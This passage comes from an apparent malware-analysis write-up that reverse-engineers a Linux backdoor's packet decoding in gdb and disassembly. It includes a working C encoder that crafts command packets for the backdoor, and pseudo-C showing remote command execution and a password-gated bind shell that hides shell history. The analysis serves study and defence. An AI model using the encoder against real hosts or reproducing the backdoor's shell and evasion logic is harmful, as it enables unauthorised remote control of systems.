00000f0: f0f1 f2f3 f4f5 f6f7 f8f9 fafb fcfd feff  ................

Now we have everything ready to do another test to the application. This time we will execute it under "gdb" up to the point after the "transforming_function" is called

[tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN 
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
(gdb) break *0x08048311
Breakpoint 1 at 0x8048311
(gdb) run < tstpacket 
Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < tstpacket
warning: shared library handler failed to enable breakpoint

Breakpoint 1, 0x08048311 in ?? ()
(gdb) 

Now we look at the two buffers passed to the function. To do it we disassemble the call with its parameters to find out where exactly the buffers are.

(gdb) disassemble 0x080482fa 0x08048311
Dump of assembler code from 0x80482fa to 0x8048311:
0x80482fa:      mov    0xffffbb20(%ebp),%edx
0x8048300:      push   %edx
0x8048301:      mov    0xffffbb28(%ebp),%ecx
0x8048307:      push   %ecx
0x8048308:      lea    0xffffffea(%esi),%eax
0x804830b:      push   %eax
0x804830c:      call   0x804a1e8
End of assembler dump.
(gdb) x/w (0xffffbb28+$ebp)
0xbfffb63c:     0xbffff32a
(gdb) x/100hb 0xbffff32a
0xbffff32a:     0x16    0x17    0x18    0x19    0x1a    0x1b    0x1c    0x1d
0xbffff332:     0x1e    0x1f    0x20    0x21    0x22    0x23    0x24    0x25
0xbffff33a:     0x26    0x27    0x28    0x29    0x2a    0x2b    0x2c    0x2d
0xbffff342:     0x2e    0x2f    0x30    0x31    0x32    0x33    0x34    0x35
0xbffff34a:     0x36    0x37    0x38    0x39    0x3a    0x3b    0x3c    0x3d
0xbffff352:     0x3e    0x3f    0x40    0x41    0x42    0x43    0x44    0x45
0xbffff35a:     0x46    0x47    0x48    0x49    0x4a    0x4b    0x4c    0x4d
0xbffff362:     0x4e    0x4f    0x50    0x51    0x52    0x53    0x54    0x55
0xbffff36a:     0x56    0x57    0x58    0x59    0x5a    0x5b    0x5c    0x5d
0xbffff372:     0x5e    0x5f    0x60    0x61    0x62    0x63    0x64    0x65
0xbffff37a:     0x66    0x67    0x68    0x69    0x6a    0x6b    0x6c    0x6d
0xbffff382:     0x6e    0x6f    0x70    0x71    0x72    0x73    0x74    0x75
0xbffff38a:     0x76    0x77    0x78    0x79
(gdb) x/w (0xffffbb20+$ebp)
0xbfffb634:     0xbfffeb14
(gdb) x/100hb 0xbfffeb14
0xbfffeb14:     0xff    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb1c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb24:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb2c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb34:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb3c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb44:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb4c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb54:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb5c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb64:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb6c:     0xea    0xea    0xea    0xea    0xea    0xea    0xea    0xea
0xbfffeb74:     0xea    0xea    0xea    0xea
(gdb) 

As we expected  we see that the first buffer is our prepared packet starting on the 16h position. The surprising result is that the second buffer comes back with a value of 255 (or -1) followed by all the bytes set to 234 (or -22).

If we repeat the test stopping the execution before the call we see that the second buffer is filled with 0's, while later on it has again the first byte with the 255 value followed by exactly 234 bytes set to 234.

This means that var_2ndBuf[1] equals 234, which obviously fails out of the range of valid options for the "case" statement. So we have to go through our next step. 

Reverse-Engineering the “Decryption” function  

We will need to disassemble the "decrypt_function" to know how do we have to "encrypt" the "packets" to send. 

To do this we start with the assembly of the function with the variables renamed (as we did in our "main" function). We then go step by step adding comments on what we can see the assembly code is performing. This bring us to the following commented assembly code;

Decrypt_Packet	proc near		; CODE XREF: main+1D8

var_10		= byte ptr -10h
var_LocBuffPtr	= dword	ptr -4
arg_length	= dword	ptr  8
arg_source	= dword	ptr  0Ch
arg_dest	= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 4
		push	edi
		push	esi
		push	ebx
		mov	edi, [ebp+arg_length]
		lea	ebx, [edi-1]	; ebx =	ArgSize-1
		lea	eax, [edi+3]	; eax =	ArgSize+3
		and	al, 0FCh	; eax =	ArgSize	Rounded	up to *4
		sub	esp, eax	; We allocate arg_size rounded 
					; bytes	on the stack
		mov	[ebp+var_LocBuffPtr], esp
		mov	al, ds:gZero
		mov	esi, [ebp+arg_dest]
		mov	[esi], al	; dest[0=gZero
		test	ebx, ebx
		jl	EmptyBuffer	; if (ArgSize-1<0) goto	...

repeat:					; CODE XREF: Decrypt_Packet+AD
		lea	edx, [ebx-1]	; edx =	ebx - 1
		test	ebx, ebx
		jz	short last_char	; if (ebx==0)
		mov	esi, [ebp+arg_source]
		movzx	eax, byte ptr [ebx+esi]
		movzx	edx, byte ptr [edx+esi]
		sub	eax, edx	; eax =	source[ebx-source[ebx-1
		jmp	short not_last_char
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
		align 4

last_char:				; CODE XREF: Decrypt_Packet+31
		mov	esi, [ebp+arg_source]
		movzx	eax, byte ptr [esi] ; eax=source[0

not_last_char:				; CODE XREF: Decrypt_Packet+40
		lea	ecx, [eax-17h]	; ecx =	eax - 17h
		test	ecx, ecx
		jge	short more_thn_17
		lea	esi, [esi+0]

weird_loop???:				; CODE XREF: Decrypt_Packet+5A
		add	ecx, 100h
		js	short weird_loop???

more_thn_17:				; CODE XREF: Decrypt_Packet+4F
		xor	edx, edx
		cmp	edx, edi	; cmp argSize,0
		jge	short none_left
		lea	esi, [esi]

for_loop:				; CODE XREF: Decrypt_Packet+73
		mov	esi, [ebp+arg_dest]
		mov	al, [edx+esi]	; al=dest[edx
		mov	esi, [ebp+var_LocBuffPtr]
		mov	[edx+esi], al	; locBuf[dx=dest[dx
		inc	edx
		cmp	edx, edi	; for (dx=0;dx<di;dx++)
					;    locBuff[dx=Dest[dx
		jl	short for_loop

none_left:				; CODE XREF: Decrypt_Packet+60
		mov	esi, [ebp+arg_dest]
		mov	[esi], cl	; dest[0=cl
		mov	edx, 1
		cmp	edx, edi	; cmp edi,1
		jge	short one_left
		nop	

scndFor_loop:				; CODE XREF: Decrypt_Packet+94
		mov	esi, [ebp+var_LocBuffPtr]
		mov	al, [edx+esi-1]
		mov	esi, [ebp+arg_dest]
		mov	[edx+esi], al	; dest[edx=locBuff[edx-1
		inc	edx
		cmp	edx, edi	; for (edx=1;edx<edi;edx++)
					;   dest[edx=locBuf[edx-1
		jl	short scndFor_loop

one_left:				; CODE XREF: Decrypt_Packet+81
		mov	esi, [ebp+var_LocBuffPtr]
		push	esi
		push	ecx
		push	offset aCS	; "%c%s"
		mov	esi, [ebp+arg_dest]
		push	esi
		call	asprintf___err___errx___fprintf___sprintf___sscanf___syslog
		add	esp, 10h
		dec	ebx
		jns	repeat		; repeat until all processed

EmptyBuffer:				; CODE XREF: Decrypt_Packet+26
		lea	esp, [ebp+var_10]
		pop	ebx
		pop	esi
		pop	edi
		mov	esp, ebp
		pop	ebp
		retn	
Decrypt_Packet	endp 

Now that we have it all commented we try to transform to some kind of pseudo-C code to have a better view on what is done. We end up with something like this;

function Decrypt_packet (int size, char *source, char *dest)
{
   char     LocBuff[2048]; //"Dynamically" allocated in the buffer
   char     *LocBuffPtr;
   int      index;
	
   LocBuffPtr = LocBuff;
   dest[0] = Global3

   index = ArgSize - 1;
   while (index>=0) {

       if (index==0) ch = source[0];
       else ch = source[index] - source[index-1];

       ch = ch - 17h;

       for (tmp=0;tmp<argSize;tmp++) locbuff[tmp]=dest[tmp];

       dest[0]=ch;
					
       for (tmp=1;tmp<argSize;tmp++) dest[tmp]=locbuff[tmp-1];
		
       sprintf ( dest, "%c%s", ch, locbuff ); 
       index--;
	}
}

Now we can see that the algorithm is an extremely inefficient (and quiet difficult to reverse-engineer) version of the next algorithm;

function Decrypt_packet (size int, source *char, dest *char)
{
	index		int;
	
	dest[0]=source[0] - 17h;
	for (index=1; index < size; index ++) {
		dest[index] = source[index] - source[index-1] - 17h;
	}
}

If we see what's the result of Decrypt_packet() applied to our "test" packet, we see inmediatelly that the result is the one we had. The fact that each byte is substituted by the difference with the previous minus 17h is the reason why we got all those "234" values; the difference was always 1, and 1-17h=-16h, which on a byte is represented as EAh (100h-16h) or 234. 

The fact that the algorithm was so strangely codified makes us think that it is possible that it was written in such a strange way just to try to prevent reverse-engineering. The other option is that the programmer wasn't good at programming and he/she was just a "script kiddy", but given the advanced topics covered on this binary and the coding of the rest of the application, this option doesn't seem probable.

Trying to get results out of "the-binary"

So now we know how the decryption process works. So we can now work on preparing our new "packet" to be delivered in a way that it goes through all the tests and jumps to the "case" statement that we want!

To do that we prepare a simple program that prepares a "packet" with one "command" or "case value" to jump to.

#include <unistd.h>
#include <stdlib.h>

char    header[0x17]={1,2,3,4,5,6,7,8,9,0xb,11,12,13,14,15,16,
                      17,18,19,20,0x2,22,00}; //includes 1st data byte

int main(int argc, char** argv)
{
        char    ch,prev;
        char    command;

        command = atoi(argv[1]);

        //Write header
        write(1,header,sizeof(header));

        //Write "encoded" Command
        ch = command + 0x17;
        write(1,&ch,1);
        prev = ch;

        //Write encoded data
        while (read(0,&ch,1)) 
                {
                ch = prev + ch + 0x17;
                write(1,&ch,1);
                prev = ch;
                }
        return(0);
}

Now we can prepare a "command-packet" using a "payload" file named 256bytes.dat consisting of the values from 0 to FFh consecutively;

[tstusr@sandbox reverse]$ gcc -Wall -o encrypt encrypt.c 
[tstusr@sandbox reverse]$ ./encrypt 1 <256bytes.dat >command1.pkt

We can try now with gdb to check if everything goes fine. We'll try with this "command1.pak" to see if we really jump to the "case 1". For that we start gdb and set a breakpoint just after the "movzx eax,[ebp+var_2ndBuf+1]" and we check if eax has a value of "1".

[tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN 
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
(gdb) break *0x804831b
Breakpoint 1 at 0x804831b
(gdb) run < command1.pkt 
Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < command1.pkt
warning: shared library handler failed to enable breakpoint

Breakpoint 1, 0x0804831b in ?? ()
(gdb) info registers eax
eax            0x1      1
(gdb) 

We can also check that our 256 bytes of payload have arrived perfectly;

(gdb) x/258hb 0xbfffeb14
0xbfffeb14:     0xe9    0x01    0x00    0x01    0x02    0x03    0x04    0x05
0xbfffeb1c:     0x06    0x07    0x08    0x09    0x0a    0x0b    0x0c    0x0d
0xbfffeb24:     0x0e    0x0f    0x10    0x11    0x12    0x13    0x14    0x15
0xbfffeb2c:     0x16    0x17    0x18    0x19    0x1a    0x1b    0x1c    0x1d
0xbfffeb34:     0x1e    0x1f    0x20    0x21    0x22    0x23    0x24    0x25
0xbfffeb3c:     0x26    0x27    0x28    0x29    0x2a    0x2b    0x2c    0x2d
0xbfffeb44:     0x2e    0x2f    0x30    0x31    0x32    0x33    0x34    0x35
0xbfffeb4c:     0x36    0x37    0x38    0x39    0x3a    0x3b    0x3c    0x3d
0xbfffeb54:     0x3e    0x3f    0x40    0x41    0x42    0x43    0x44    0x45
0xbfffeb5c:     0x46    0x47    0x48    0x49    0x4a    0x4b    0x4c    0x4d
0xbfffeb64:     0x4e    0x4f    0x50    0x51    0x52    0x53    0x54    0x55
0xbfffeb6c:     0x56    0x57    0x58    0x59    0x5a    0x5b    0x5c    0x5d
0xbfffeb74:     0x5e    0x5f    0x60    0x61    0x62    0x63    0x64    0x65
0xbfffeb7c:     0x66    0x67    0x68    0x69    0x6a    0x6b    0x6c    0x6d
0xbfffeb84:     0x6e    0x6f    0x70    0x71    0x72    0x73    0x74    0x75
0xbfffeb8c:     0x76    0x77    0x78    0x79    0x7a    0x7b    0x7c    0x7d
0xbfffeb94:     0x7e    0x7f    0x80    0x81    0x82    0x83    0x84    0x85
0xbfffeb9c:     0x86    0x87    0x88    0x89    0x8a    0x8b    0x8c    0x8d
0xbfffeba4:     0x8e    0x8f    0x90    0x91    0x92    0x93    0x94    0x95
0xbfffebac:     0x96    0x97    0x98    0x99    0x9a    0x9b    0x9c    0x9d
0xbfffebb4:     0x9e    0x9f    0xa0    0xa1    0xa2    0xa3    0xa4    0xa5
0xbfffebbc:     0xa6    0xa7    0xa8    0xa9    0xaa    0xab    0xac    0xad
0xbfffebc4:     0xae    0xaf    0xb0    0xb1    0xb2    0xb3    0xb4    0xb5
0xbfffebcc:     0xb6    0xb7    0xb8    0xb9    0xba    0xbb    0xbc    0xbd
0xbfffebd4:     0xbe    0xbf    0xc0    0xc1    0xc2    0xc3    0xc4    0xc5
0xbfffebdc:     0xc6    0xc7    0xc8    0xc9    0xca    0xcb    0xcc    0xcd
0xbfffebe4:     0xce    0xcf    0xd0    0xd1    0xd2    0xd3    0xd4    0xd5
0xbfffebec:     0xd6    0xd7    0xd8    0xd9    0xda    0xdb    0xdc    0xdd
0xbfffebf4:     0xde    0xdf    0xe0    0xe1    0xe2    0xe3    0xe4    0xe5
0xbfffebfc:     0xe6    0xe7    0xe8    0xe9    0xea    0xeb    0xec    0xed
0xbfffec04:     0xee    0xef    0xf0    0xf1    0xf2    0xf3    0xf4    0xf5
0xbfffec0c:     0xf6    0xf7    0xf8    0xf9    0xfa    0xfb    0xfc    0xfd
0xbfffec14:     0xfe    0xff

The first byte is the last 00 that we had on the "header" of our application, and the second is the command itself. After that come our 256 bytes exactly as we had them before going through our "encrypt" program.

We can also provide the binary with more than one packet. We have to consider the fact that our "recv" will in fact read at most 2048 bytes of stdin. So if we want to provide more than 1 packet we just have to make sure that all the packets are 2048 bytes in length (except the last that can be any size).

We will do it by preparing an input file with one "command 1" and one "command 2" pakets.

[tstusr@sandbox reverse]$ ./encrypt 2 <256bytes.dat >command2.pkt
[tstusr@sandbox reverse]$ cp command1.pkt command1.2048.pkt
[tstusr@sandbox reverse]$ echo '00007ff: 00'| xxd -r - command1.2048.pkt 
[tstusr@sandbox reverse]$ cp command2.pkt command2.2048.pkt
[tstusr@sandbox reverse]$ echo '00007ff: 00'| xxd -r - command2.2048.pkt 
[tstusr@sandbox reverse]$ ls -l command?.2048.pkt
-rw-rw-r--    1 tstusr   tstusr       2048 May 30 01:25 command1.2048.pkt
-rw-rw-r--    1 tstusr   tstusr       2048 May 30 01:25 command2.2048.pkt
[tstusr@sandbox reverse]$ cat command1.2048.pkt command2.2048.pkt > command1-2.pkt

Now we can test that effectively we read two packets and that both "jump" to their corresponding "case" statement with gdb;

[tstusr@sandbox reverse]$ gdb the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN 
GNU gdb 5.0rh-5 Red Hat Linux 7.1
Copyright 2001 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...(no debugging symbols found)...
(gdb) break *0x804831b
Breakpoint 1 at 0x804831b
(gdb) run < command1-2.pkt 
Starting program: /home/tstusr/reverse/the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < command1-2.pkt
warning: shared library handler failed to enable breakpoint

Breakpoint 1, 0x0804831b in ?? ()
(gdb) info registers eax
eax            0x1      1
(gdb) cont
Continuing.

Breakpoint 1, 0x0804831b in ?? ()
(gdb) info registers eax
eax            0x2      2
(gdb)

All good! We have checked that BOTH pakets have been read and the "command" has arrived to its destination. The question that arises now is; what has happened inside the "case 1"? And what would happen if we instruct gdb to "cont" again?

Once thing worth mentioning here is that while doing all this tests we've had our sniffer up and running all the time and it hasn't registered any activity coming from the binary.

Its time to find out its capabilities.

Reverse-Engineering the "cases" in the "Main loop"

To do this we will proceed in a similar way we did to reverse-engineer the decryption packet. Starting from an assembler code with as many variables identified as possible and with as many comments as possible to try to end up with a Pseudo-C code that allows us to understand what the 12 "cases" or "commands" do. The result is as follows;

case1:	var_Buf.hdr.ihl_version = 0;
	var_Buf.hdr.ihl_version = gDouble1;
	var_Buf.hdr.TOS = 1;
	var_Buf.hdr.len = 7;
	if (gPID2 == 0) var_Buf.hdr.len+1 = 0;
	else {
		var_Buf.hdr.len+1 = 1;
		var_Buf.hdr.id = g_LastCommand;
	}

	Encrypt_Packet (400, &var_Buf, &var_2ndBuf);
	fun1 ( var_AddrPtr, &var_2ndBuf, 400 + (rand??_caller() mod 201));
	break;

case2:	gWord2_0_or_2 = var_2ndBuf[2];
	gbdaddr = var_Buf.hdr.daddr;
	randomize??(time(0));

	esi=0;
	edi=rand??_caller mod 10;

	for (ebx=0; ebx<=9; ebx++) {
		if (ebx!=edi) {
			if (gWord2_0_or_2 == 2) {
				var_Addr[esi..esi+3]=var_2ndBuf[ebx*4+3..ebx*4+6]
			} 
			else {
				var_Addr[esi..esi+3]=byte(SOMEWEIRDRANDOMVALUE);
			}//if (gWord2_0_or_2==2)
		} //if (ebx!=edi)
		esi +=4 ;
	} 
	if (gWord2_0_or_2 != 2) {
		if (gWord2_0_or_2 != 0) edi=0;
		edi = edi*4;
		var_0Value? = edi;
		var_Addr[edi] = var_2ndBuf[3..6];
	}
	break;
	//Fills the "var_Addr[10]" array. It's an array of 10 addresses
	//If gWord2_0_or_2 == 2 it gets everything from the 2ndBuf, except one of the addresses that's left intact
        //If gWord2_0_or_2 == 0 it fills everything with random values except the "random hole" of the array with the first value passed on 2ndBuf[3..6]
	//If gWord2_0_or_2 == other it fill everything with random values except the first value, which is set to the first value passed on 2ndBuf[3..6]

case3:		
	gPID = fork();
	if (gPID==0) {//child
		setsid()
		signal(sigChild,1);
		if (fork()!=0) { //parent
			sleep(10);
			kill (gpid, SIGKILL); //???? Does it kill anyone??? gpid=0!!!
			_called_to_exit(0);
		}
		for (ebx=0;ebx<398;ebx++)
			Buf2[ebx]=Buf2[ebx+2]; 

		sprintf(Buffer, "/bin/csh -f -c "%s" 1> %s 2>&1",Buf2, "/tmp/.hj237349");

		EXECUTES IT

		OPEN (tmp)
		while 
			READS tmp file
			Encripts
			FUN1_sends it to (var_AddrPtr, 44E8Buffer, (rand()mod 201) +400);
		endwhile;
		exit(0);
	};
	break;

case4:		
	if (gPID2==0) {
		gLastCommand = 4;
		gPID2 = fork();
		if (gPID2==0) {
			var_buf256Bytes[0..255]=var_Buf2[0..255];
			var_buf256Bytes[0..255]=var_buf256Bytes[0+9..255+9];
			Loc_Fun_4 ( var_Buf2[2,3,4,5],0,var_Buf2[6,7,8],&var_buf256Bytes);
			//gPID2=0 in Loc_Fun_4
			exit(0);
		}
	}

case5:	
	if (gPID2==0) {
		gLastCommand = 5;
		gPID2 = fork();
		if (gPID2==0) {
			var_Buf256Bytes[0..255]=Buf2[0..255];
			var_Buf256Bytes[0..255]=var_Buf256Bytes[0+13..255+13];
			Loc_Fun_6 ( var_Buf2[2,3,4,5,6,7,8,9,10,11,12,&var_buf256Bytes);
			//gPID2=0 inside Loc_Fun_6
			exit(0);
		}
	}

case6:					
	if (gpid2==0) {
		gLastCommand = 6;
		signal(SIGCHLD,SIG_IGN);
		gPID2=fork();
		if (gPID2==0) {
			setsid();
			signal(SIGCHLD,SIG_IGN);
			var_bindSockAddr.sin_family = AF_INET;
			var_bindSockAddr.s_addr=0F15Ah;
			var_bindSockAddr.s_addr+2=0
			var_setsockopt_optval=1
			var_SD = socket (AF_INET,SOCKSTREAM,0);
			signal (SIGCHLD,SIG_IGN);
			signal (SIGCHLD,SIG_IGN);
			signal (SIG_HUP,SIG_IGN);
			setsockopt(var_mainSD, SOL_SOCKET, SO_REUSEADDR,&var_setsockopt_optval);
			bind(var_SD,&var_bindSockAddr,16);
			listen(var_SD,3);
			do {
				var_FD = accept(var_SD,&var_AcceptSockAddr, &var_AcceptAddrLen);
				if (var_FD==0) exit(0);
			} while(fork()==0);
			recv (var_FD, &var_TCPRecvBuf,19,0);
			for (bx=0;bx<=18;bx++) do {
				if (var_TCPRecvBuf[bx]==(LineFeed|CR)) var_TCPRecvBuf[bx]=0;
				else var_TCPRecvBuf[bx]++;
			if (var_TCPRecvBuf!="TfOjG") {
				send(var_FD,gPwdFailedRespo,4,0);
				close(var_FD);
				exit(1);
			}
			dup2(var_FD,0);
			dup2(var_FD,1);
			dup2(var_FD,2);
			setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.",1);
			unsetenv("HISTFILE");
			setenv("TERM","linux",1);
			execl("/bin/sh","sh",0);
			close(var_FD);
			exit(0);		
		}
	};
	break;

case7:
	gPID = fork();
	if (gPID==0) {
		setsid()
		signal(SIGCHLD,1);
		if (fork()!=0) {sleep???(1200);kill(SIGKILL,gPID);exit(0);}//1200=20min
		for(ebx=0;ebx<=397;ebx++) var_Buf2[ebx]=var_Buf2[ebx+2];
		sprintf(&Buffer, "/bin/csh -f -c "%s" ",Buf2Ptr);
		??execv??(&Buffer);
		exit(0);
	}
	break;

case8:	
	if (gPID2!=0) {
		kill(gPID2,SIGKILL);
		gPID2 = 0;
	}
	break;	

case9:	
	if (gPID2==0) {
		g_LastCommand = 9;
		gPID2==fork()
		if (gPID2!=0) {
			var_Buf256Bytes[0..255]=Buf2[0..255];
			var_Buf256Bytes[0..255]=var_Buf256Bytes[0+10..255+10];
			Fun4(buf2[2,3,4,5,6,7,8,9],&var_Buf256Bytes);
			exit(0);
		}
	}
	break;
case10:
	if (gPID2==0) {
		g_LastCommand = 9;
		gPID2==fork()
		if (gPID2!=0) {
			var_Buf256Bytes[0..255]=Buf2[0..255];
			var_Buf256Bytes[0..255]=var_Buf256Bytes[0+14..255+14];
			Fun7(buf2[2,3,4,5,6,7,8,9,10,11,12],0,buf2[13],&var_Buf256Bytes);
			exit(0);
		}
	}
	break;
case11:					
	if (gPID2==0) {
		g_LastCommand = 11;
		gPID2==fork()
		if (gPID2!=0) {
			var_Buf256Bytes[0..255]=Buf2[0..255];
			var_Buf256Bytes[0..255]=var_Buf256Bytes[0+15..255+15];
			Fun7(buf2[2,3,4,5,6,7,8,9,10,11,12,13,14],&var_Buf256Bytes);
			exit(0);
		}
	}
	break;
case 12:
	if (gPID2==0) {
		g_LastCommand = 12;
		gPID2==fork()
		if (gPID2!=0) {
			var_256Bytes[0..255]=Buf2[0..255];
			var_256Bytes[0..255]=var_256Bytes[0+14..255+14];
			Fun5(buf2[2,3,4,5,6,7,8,9,10,11,12,13],&var_256Bytes);
			exit(0);
		}
	}
	break;

We can see that there are several calls to function defined nearby (named FunN or LocFunN). We'll have to work a little bit on them. Here's a quick description of the functionality they provide;

With all that we can see part of the functionality that this "cases" provide;